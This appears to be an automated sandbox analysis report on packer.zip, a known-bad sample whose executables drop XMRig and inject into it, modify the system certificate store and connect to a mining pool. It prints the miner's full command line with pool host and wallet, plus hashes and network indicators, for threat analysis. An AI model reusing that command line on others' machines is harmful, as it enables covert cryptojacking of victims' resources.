Analysis Overview
SHA256
2712cfc84e57a8c2c3637bc69d65c1741fcb7a600c78709bbe3d47c5f76a4293
Threat Level: Known bad
The file packer.zip was found to be: Known bad.
Malicious Activity Summary
XMRig Miner payload
xmrig
Executes dropped EXE
Unsigned PE
Suspicious use of AdjustPrivilegeToken
Modifies system certificate store
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Suspicious behavior: LoadsDriver
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-22 14:33
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-22 14:31
Reported
2024-05-22 15:15
Platform
win10v2004-20240426-en
Max time kernel
1797s
Max time network
1801s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3136 wrote to memory of 5060 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3136 wrote to memory of 5060 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| NL | 23.62.61.129:443 | www.bing.com | tcp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| NL | 23.62.61.129:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 85.65.42.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/5060-16-0x00000265D4B40000-0x00000265D4B60000-memory.dmp
memory/5060-17-0x00000265D4B90000-0x00000265D4BB0000-memory.dmp
memory/5060-18-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-20-0x00000265D6470000-0x00000265D6490000-memory.dmp
memory/5060-19-0x00000265D6490000-0x00000265D64B0000-memory.dmp
memory/5060-21-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-22-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-25-0x00000265D6470000-0x00000265D6490000-memory.dmp
memory/5060-24-0x00000265D6490000-0x00000265D64B0000-memory.dmp
memory/5060-23-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-26-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-27-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-28-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-29-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-30-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-31-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-32-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-33-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-34-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-35-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-36-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-37-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-38-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-39-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-40-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-41-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-42-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-43-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-44-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-45-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-46-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-47-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-48-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-49-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-50-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-51-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-52-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-53-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-54-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-55-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-56-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-57-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-58-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-59-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-60-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-61-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-62-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-63-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-64-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-65-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-66-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-67-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-68-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-69-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-70-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-71-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-72-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-73-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-74-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-75-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-76-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-77-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-78-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-79-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-80-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-81-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-82-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-83-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-84-0x00007FF770A60000-0x00007FF771563000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2024-05-22 14:31
Reported
2024-05-22 15:17
Platform
win10v2004-20240426-en
Max time kernel
1793s
Max time network
1788s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5028 wrote to memory of 3104 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 5028 wrote to memory of 3104 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.201.86.20.in-addr.arpa | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.73.42.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/3104-16-0x00000201D81E0000-0x00000201D8200000-memory.dmp
memory/3104-17-0x00000201D9C30000-0x00000201D9C50000-memory.dmp
memory/3104-18-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-20-0x00000201D9C70000-0x00000201D9C90000-memory.dmp
memory/3104-19-0x00000201D9C50000-0x00000201D9C70000-memory.dmp
memory/3104-21-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-22-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-25-0x00000201D9C70000-0x00000201D9C90000-memory.dmp
memory/3104-24-0x00000201D9C50000-0x00000201D9C70000-memory.dmp
memory/3104-23-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-26-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-27-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-28-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-29-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-30-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-31-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-32-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-33-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-34-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-35-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-36-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-37-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-38-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-39-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-40-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-41-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-42-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-43-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-44-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-45-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-46-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-47-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-48-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-49-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-50-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-51-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-52-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-53-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-54-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-55-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-56-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-57-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-58-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-59-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
